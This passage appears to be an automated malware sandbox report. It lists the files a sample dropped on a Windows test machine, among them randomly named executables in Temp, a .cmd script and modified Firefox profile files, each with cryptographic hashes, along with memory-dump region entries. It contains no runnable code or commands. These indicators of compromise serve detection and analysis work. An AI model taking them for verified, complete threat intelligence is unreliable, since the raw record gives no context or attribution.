SHA512 0b4c50e40af92bc9589668e13df417244274f46f5a66e1fc7d1d59bc281969ba319305becea119385f01cc4603439e4b37afa2cf90645425210848a02839e3e7

C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\Crypto\Cipher\_raw_cbc.pyd

MD5 40390f2113dc2a9d6cfae7127f6ba329
SHA1 9c886c33a20b3f76b37aa9b10a6954f3c8981772
SHA256 6ba9c910f755885e4d356c798a4dd32d2803ea4cfabb3d56165b3017d0491ae2
SHA512 617b963816838d649c212c5021d7d0c58839a85d4d33bbaf72c0ec6ecd98b609080e9e57af06fa558ff302660619be57cc974282826ab9f21ae0d80fbaa831a1

C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\Crypto\Cipher\_raw_ecb.pyd

MD5 80bb1e0e06acaf03a0b1d4ef30d14be7
SHA1 b20cac0d2f3cd803d98a2e8a25fbf65884b0b619
SHA256 5d1c2c60c4e571b88f27d4ae7d22494bed57d5ec91939e5716afa3ea7f6871f6
SHA512 2a13ab6715b818ad62267ab51e55cd54714aebf21ec9ea61c2aefd56017dc84a6b360d024f8682a2e105582b9c5fe892ecebd2bef8a492279b19ffd84bc83fa5

C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\win32api.pyd

MD5 e9d8ab0e7867f5e0d40bd474a5ca288c
SHA1 e7bdf1664099c069ceea18c2922a8db049b4399a
SHA256 df724f6abd66a0549415abaa3fdf490680e6e0ce07584e964b8bfd01e187b487
SHA512 49b17e11d02ae99583f835b8ecf526cf1cf9ceab5d8fac0fbfaf45411ac43f0594f93780ae7f6cb3ebbc169a91e81dd57a37c48a8cd5e2653962ffbdcf9879bb

C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\_lzma.pyd

MD5 9e94fac072a14ca9ed3f20292169e5b2
SHA1 1eeac19715ea32a65641d82a380b9fa624e3cf0d
SHA256 a46189c5bd0302029847fed934f481835cb8d06470ea3d6b97ada7d325218a9f
SHA512 b7b3d0f737dd3b88794f75a8a6614c6fb6b1a64398c6330a52a2680caf7e558038470f6f3fc024ce691f6f51a852c05f7f431ac2687f4525683ff09132a0decb

C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\_bz2.pyd

MD5 30f396f8411274f15ac85b14b7b3cd3d
SHA1 d3921f39e193d89aa93c2677cbfb47bc1ede949c
SHA256 cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f
SHA512 7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f

C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\zstandard\backend_c.pyd

MD5 0fc69d380fadbd787403e03a1539a24a
SHA1 77f067f6d50f1ec97dfed6fae31a9b801632ef17
SHA256 641e0b0fa75764812fff544c174f7c4838b57f6272eaae246eb7c483a0a35afc
SHA512 e63e200baf817717bdcde53ad664296a448123ffd055d477050b8c7efcab8e4403d525ea3c8181a609c00313f7b390edbb754f0a9278232ade7cfb685270aaf0

C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\vcruntime140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/4860-205-0x0000015768960000-0x0000015768972000-memory.dmp

memory/4860-206-0x0000015768D00000-0x0000015768D10000-memory.dmp

memory/5068-207-0x0000000000450000-0x000000000090F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

memory/2056-221-0x00000210E4E90000-0x00000210E4EB2000-memory.dmp

memory/2184-231-0x00007FF6807F0000-0x00007FF681391000-memory.dmp

memory/3452-232-0x00007FF7AB580000-0x00007FF7ACBCB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 73636685f823d103c54b30bc457c7f0d
SHA1 597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

memory/5068-254-0x0000000000450000-0x000000000090F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

MD5 47177b7fbf1ce282fb87da80fd264b3f
SHA1 d07d2f9624404fa882eb94ee108f222d76bbbd4c
SHA256 e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
SHA512 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

memory/1372-270-0x00000000007F0000-0x0000000000800000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/2400-283-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe

MD5 83cd4a3ac24bea5dd2388d852288c7de
SHA1 059245d06571b62c82b059a16b046793f6753dbc
SHA256 a8bc81ff72efd02a4edf01f87d1f108886d80a2484a91e776a4e947b3f47bad1
SHA512 5133d4638db05e87daaba1b5725ddaaddb434440e31a2241732dfcc21d3f8c03212f715171d990f0fd601eb926a8a0308b93f5d8139c697399a06e891725c31c

memory/1588-318-0x0000000006340000-0x0000000006694000-memory.dmp

memory/1588-319-0x0000000006D10000-0x0000000006D5C000-memory.dmp

memory/5068-320-0x0000000000450000-0x000000000090F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

memory/2128-348-0x00000000004B0000-0x000000000096F000-memory.dmp

memory/2128-354-0x00000000004B0000-0x000000000096F000-memory.dmp

memory/2180-355-0x0000000005DB0000-0x0000000006104000-memory.dmp

memory/2400-367-0x0000000000400000-0x0000000000840000-memory.dmp

memory/3924-370-0x0000025D99BC0000-0x0000025D99BC8000-memory.dmp

memory/3368-372-0x000000000D690000-0x000000000DF13000-memory.dmp

memory/2400-388-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4860-413-0x000001576B410000-0x000001576B938000-memory.dmp

memory/5068-414-0x0000000000450000-0x000000000090F000-memory.dmp

memory/4408-415-0x0000000000450000-0x000000000090F000-memory.dmp

memory/4924-416-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe

MD5 d054bcb257edeee50293394229ab1c67
SHA1 80f84013bdc91aa820a0534a297be285e9f0c9f8
SHA256 b4f1440eeb98201163dbc847c76b499538b6e5c05ab178ee255abe190cc7e26e
SHA512 ac52e358cd513783e130c2fd34da7d71bb25039ef4da81921b53be24b21cd5c4d83e0e000c1701b4eec9b9cf0fdd5b14a0801e240ef67efaa60cfb5a100d5f26

memory/1820-429-0x00000000002F0000-0x0000000000CF2000-memory.dmp

memory/4848-437-0x0000000000F90000-0x000000000144F000-memory.dmp

memory/4848-438-0x0000000000F90000-0x000000000144F000-memory.dmp

memory/2400-439-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/3836-467-0x0000000000F90000-0x0000000001008000-memory.dmp

memory/428-470-0x0000000000400000-0x0000000000465000-memory.dmp

memory/428-471-0x0000000000400000-0x0000000000465000-memory.dmp

memory/5068-472-0x0000000000450000-0x000000000090F000-memory.dmp

memory/4384-473-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4384-483-0x0000025CC5430000-0x0000025CC5450000-memory.dmp

memory/4384-482-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4924-484-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4384-474-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4384-486-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4384-488-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4384-487-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4384-485-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4384-489-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4924-490-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1820-491-0x00000000002F0000-0x0000000000CF2000-memory.dmp

memory/1820-492-0x00000000002F0000-0x0000000000CF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe

MD5 5d153f73ce1b6a907cf87ddb04ba12b2
SHA1 bfda9ee8501ae0ca60f8e1803efea482085bf699
SHA256 2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c
SHA512 0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102

memory/2856-505-0x0000000000F70000-0x0000000001BC1000-memory.dmp

memory/4408-506-0x0000000000400000-0x000000000042F000-memory.dmp

memory/4408-507-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1820-509-0x00000000002F0000-0x0000000000CF2000-memory.dmp

memory/2400-508-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4384-512-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4408-516-0x0000000010000000-0x000000001001C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe

MD5 8538c195a09066478922511ea1a02edf
SHA1 15e8910df845d897b4bb163caef4c6112570855b
SHA256 d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96
SHA512 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c

memory/5068-532-0x0000000000450000-0x000000000090F000-memory.dmp

memory/2232-533-0x0000000000EC0000-0x000000000136B000-memory.dmp

memory/4924-550-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2856-570-0x0000000000F70000-0x0000000001BC1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\7CPZATFC\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/2400-572-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2856-573-0x0000000000F70000-0x0000000001BC1000-memory.dmp

memory/2232-577-0x0000000000EC0000-0x000000000136B000-memory.dmp

memory/2416-579-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2856-580-0x0000000000F70000-0x0000000001BC1000-memory.dmp

memory/4384-582-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe

MD5 2a48e7b047c5ff096c6dce52d4f26dbb
SHA1 e0d61e10b27131b1c34ade44d1a2117afd2cf099
SHA256 42642893c6a6af226aab5b2cce0875e7affebf7d1001146ddd90234d4c01492d
SHA512 75965d3aa7cda41ecc11f87b1ac2b12283d58650f5b96f2af560aff859ca74c0c0cb26dfc765b4d8318291d8f89fdbb338fb71ddf3f4b63389aedb5e2106165a

memory/2312-597-0x0000000000DE0000-0x00000000010F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe

MD5 338a31056b3b81d48a292a7bf9af67c7
SHA1 f5061e3583ba604b25e316f12fc58f40238d44b4
SHA256 cd1c085a07dc81e4305c2b9ee57e5c0433858c97cb20b1743cf44931c431ccea
SHA512 5bc7823cbd1ab6fa963df8f152d8b6de56af41159f3a736d147f1e5b4dcba3007319e2d2fb13e97f1e8b3cce3ab0d17e31d541be1ab53f8bd05a42316a940abc

memory/3352-624-0x0000000000ED0000-0x0000000001557000-memory.dmp

memory/3352-627-0x0000000000ED0000-0x0000000001557000-memory.dmp

memory/2312-633-0x0000000000DE0000-0x00000000010F4000-memory.dmp

memory/1612-638-0x00000000001D0000-0x000000000068F000-memory.dmp

memory/2312-637-0x0000000000DE0000-0x00000000010F4000-memory.dmp

memory/1612-642-0x00000000001D0000-0x000000000068F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe

MD5 c0caf5a901b162b6792eab9697827b5d
SHA1 d078ba4ad104c40bf5f2c8afda1cbdf4afc55a84
SHA256 28c182baea1726c3e851405b13f130e02817099758abab86ca9cdc3607b9f89f
SHA512 3fba4eb7a2bc21fc24a6e29495e598efc5f208db030b13de8af43a392a93e3a920e4e8e4b68e10d4dc4a0e8779401ca738172ca9cba2ddc2246854c41a8a58a5

memory/2400-671-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe

MD5 8043b20e32ff2f0c75e9a3eed0c4bf07
SHA1 5464aa1bc2a91c64cd8c4cbbb6970e8189c158a3
SHA256 69a487512dfb97f08d068d0f9dd3924f42bef46bddd79112cb206b00fc16713e
SHA512 35639c6aad3dd25f606ca72ad108f774b083fa62677772242d357d59add9bba1dc85532d58ae67277d90c04dd4a5189548ca331fe93ee086c31cacbf11b8a18c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\AlternateServices.bin

MD5 463a7ae0ff86b11d010a64e4c9aee7a5
SHA1 fdaf7e5fbdb90ce33364d429544e2f5d910cf5b7
SHA256 5f309e0e87c54bbd940e6399eced9492da05c17365bfe11c81638269a0e0bb6e
SHA512 faed708dc9c39c4206fc798817884ce8df4566760c0f2f530ebbc71bc24f6635ab14d6e2ebd9603c5cbaaeaaecd816314f6a54de4e7ec5204183adcf55fb7999

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\58tontji.default-release\activity-stream.discovery_stream.json

MD5 1f85371e72951bbc67cd29808d0076dd
SHA1 2f3636bada3d08517e52b29525d065d6dae6cbfa
SHA256 112cbfeacdd2efb5ef37388d58009f147c4b9f3dd7dbef620b95437f5c0ecf14
SHA512 8a6b237875cb3ab5d1eda5870e276e6e3011b232d4962242581ca5d4946ce1e0d0576e62d019016aaacde13f3a3d4772b698ec3de2371e22be5c6edb5652a714

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\2a9dfd87-370d-4332-a901-a7b353c8df64

MD5 fbe16b9eb8db9ad6ad3c88ee280a6c3c
SHA1 2a3305fc7b4847d61bbaf9c2a181da0f3338316e
SHA256 b3c00109c814078cf37c2d24f10515763cebeee40c9c7912a574a8efbca97790
SHA512 17aeab6794f619f504fb98ed08aba62b31da7873e9a7d36b55d4c44d791695bb39f408f3f9876d651625c433601b4c5932cefade1731de7ecabeb6c2bb281d96

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\4c6875ae-4fb4-49b8-a3fe-4e46c2d92175

MD5 ea68e3047d8a6218fbba02c9327f4ab2
SHA1 dbada4af8da5f8d839fa536284ecc49ee559c0aa
SHA256 848912f2067591de26200b8f31f3f10f9074decf3a19338c48d5c3233f510173
SHA512 aac959380b74404a12f2c975093d68181fa329f5b53e505e931a8d5dddd013405057b18b8eb540c0c2f7dc01662e61d8eb2d1fc9d66cbae0b36a26eb83833a8e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\e6f59a4c-aff8-4474-929b-a6765456370a

MD5 04b827868c08d54c6c2dc88ce8829d32
SHA1 9048d17fa133afd8ba56da1b2d64113e082ae60d
SHA256 7a0be68e8300e1c665b677e87f07eed0fac1365e7673dfb4dfac4db38756ea5e
SHA512 7042b39005ab4b0c218dd6cede15102171aa0cde92ae2917dded689a410aeb6c823e6e2cb4b8bf45dbdde3575bd30d7cfc3e1b41db378a8145db53ca819d6159

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp

MD5 00b5792cdd6ee60541924c478d61e7b4
SHA1 743ab572232742f62baa6161650b22fed4f58167
SHA256 a08d26cc9f7a992bd92cd95461b0b646722c347d4e64d3de081230c6c554d3d7
SHA512 8066fafbc063a277bfdd8a43d6e3e2e1018c2b6ec31952ae1f3f40ce71be1c92f1b4bb43906f74bc18f0a29e7649f7f044133ee0cfbbbe9a475223a4cf5acbc3

memory/5232-729-0x0000000000830000-0x0000000000C88000-memory.dmp

memory/5232-937-0x0000000000830000-0x0000000000C88000-memory.dmp

memory/5232-961-0x0000000000830000-0x0000000000C88000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp

MD5 37b97fe6d8f879395b2f1f8aa5d6afe3
SHA1 9347bbdc4e4f13b1c4657da2c5b6a2d592c99f36
SHA256 4b36bbe6cf4ecd8dff24eba20cfd455efb5cb7aadbf154b02eb91250fc6eaa30
SHA512 4107bf08ebbe7cf58433104bad79357c8b95f9e406365bce62f01123602fd8afaa5085329de57d23cdf9c9f77bcc021eec9ef3e10eff715b17a591754ce9c8b7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs.js

MD5 53d96046f8aebeab5fedf92ce63217cb
SHA1 f19a6e7b886a92f7e59e6ffeab11c6b30aa9bfa6
SHA256 df7aaad4ae8a6b23a17c763945119c00f3ad5cfbe2e89dac981b0d9e570bd171
SHA512 cd050891afc687dda0f4f57f9dfab81660294ac218ee88e1b3d37b17148aa3460e606f07c3e181915dddbb4ac3761306787ed92ac86ee4e4803529b3f7d39ce0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\AlternateServices.bin

MD5 b8a837f08a624d85f0243557d120a683
SHA1 6172baed2ac554d5e5d0157fc3dffa2ce66cb880
SHA256 911c444d68d4a7b61c6f3789635fcb4a62a841266ec4c2577fe156827d757233
SHA512 f95e5ae12ae8bc6bb71a27d007675aaebf2ca1c9b77621488b2a2cb21aac7748cb62d2516d118309d525c0b73a1d0fc756e2fefaaea4a1ff2268d1dd57cf3151

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\AlternateServices.bin

MD5 1d946d1e8be7221f7e28eb9a1b85d9bc
SHA1 da446331a66e7bb442350b298ed6f77fda6a09c9
SHA256 fd96defb65af0bd52250a9540199495382f66ea06d55a890cbb40122c30eacf6
SHA512 9e7880a5c7652e66cc7da07a0324cb638aa244d5564e20a5e72a913ba0b16c2b9552f1420f05cdb1957609949f36d0230e8e05f5eaa6341468b7a232409a7cf6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs-1.js

MD5 fffc47194bae0e547af96e1b33d6b77d
SHA1 c543a27c59b3451a57bf262d58e74fa2f3f2adca
SHA256 a7ccfddc6c66f775230e77d9cc2c2f55c8261ede22445db699c5a8800a42a628
SHA512 f56484bc23d69f629e0e5e8bbe4880b89143677f1ecd6562ba12e45e604cf66e2a9863919e8bb76ca77a5c1562c9dedee4228956e4970c9bf0483d3203ee0f49

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\EEUCUS8F\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

memory/5232-1096-0x0000000000830000-0x0000000000C88000-memory.dmp

memory/5232-1105-0x0000000000830000-0x0000000000C88000-memory.dmp

memory/5712-1107-0x0000000000450000-0x000000000090F000-memory.dmp

memory/5712-1109-0x0000000000450000-0x000000000090F000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp

MD5 ece6efc63f8f53510b3dca9b20f9ab12
SHA1 fc744e5fefe97f8649fd4533233bca4b1398fd4a
SHA256 0e3f22c0070fa9cadea1a99531b4ae39b3eebd0e52c1a4be40ba6bf228747584
SHA512 756e4dbd2929b5f15458113c3fdf7c6391dbb3bb2ad681d544275e565b7a4d1d039820a39e7c0293039de504f6874556c69b8da31a9bc511e2233d83938b4851

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs-1.js

MD5 9518958f576f9811e1c10a20e4e4e880
SHA1 aa0a284e664da53808f83d08050544be945ec2ca
SHA256 ad65974bfacbb2c599381ac478b8c8973805ba495d5176a43916f5cf267aecf2
SHA512 43db5294a9cde8ae222904dd79f655df62b48accce887cafd8e650b5d7869a80c5c6d3c0499f89b1b7c3f7e62c6df8b05854dc4e72e7e392285f2793a846b574

C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/5496-1216-0x0000000000270000-0x000000000095E000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\58tontji.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

MD5 6634e045ea77c37dde6391b4498eee78
SHA1 fa57d63bfc6565a985f894fbaacee45e1652062d
SHA256 01016ee7a7abcd878e0aada10300bd6ca2323c5a31efd6583f7211abb2116463
SHA512 5bb515b22347e3abae5286a549c74e48c7d5eaa2426193b82ad83d2bc70271bbc972d147703d549acd3c40da61e8f050ff34c07dbd2b0166aea9446c359c4803

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 ff086d402e40fbec7605ed7319475754
SHA1 780dc8b4a7029c913db2cb6014d103b2f196c115
SHA256 ecee1b046b8dfd41c7c39e1689630f345edc313a3ba532daefe694602e499f99
SHA512 3091c3be3ff8944cf2c192f84e22b148bd3156167cd7ce5bd35f479e18971869fc362b30faba8c2dc060d29711533e460760e0d35d11bc03c07ad46c50e91f36

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\58tontji.default-release\cache2\entries\8DF0E9F84C5909278CF68CB55A683669F40995FB

MD5 d176c8de49b621a746acd1e113f81b0b
SHA1 38a90a32b2b131e52a08a75543faae98872480be
SHA256 357332277d1b6c8507dd937e50f5035c80b464d029598a4be632919c039df171
SHA512 c5f53252844ccaec5ecc39573c10538d327fee4beeedb30660789873172022c13aa7c7859832b391cae7f192a63571cf8e0b90d22b97cbcfba4691d28a6a75cf

C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

memory/5640-1568-0x0000000000070000-0x0000000000511000-memory.dmp

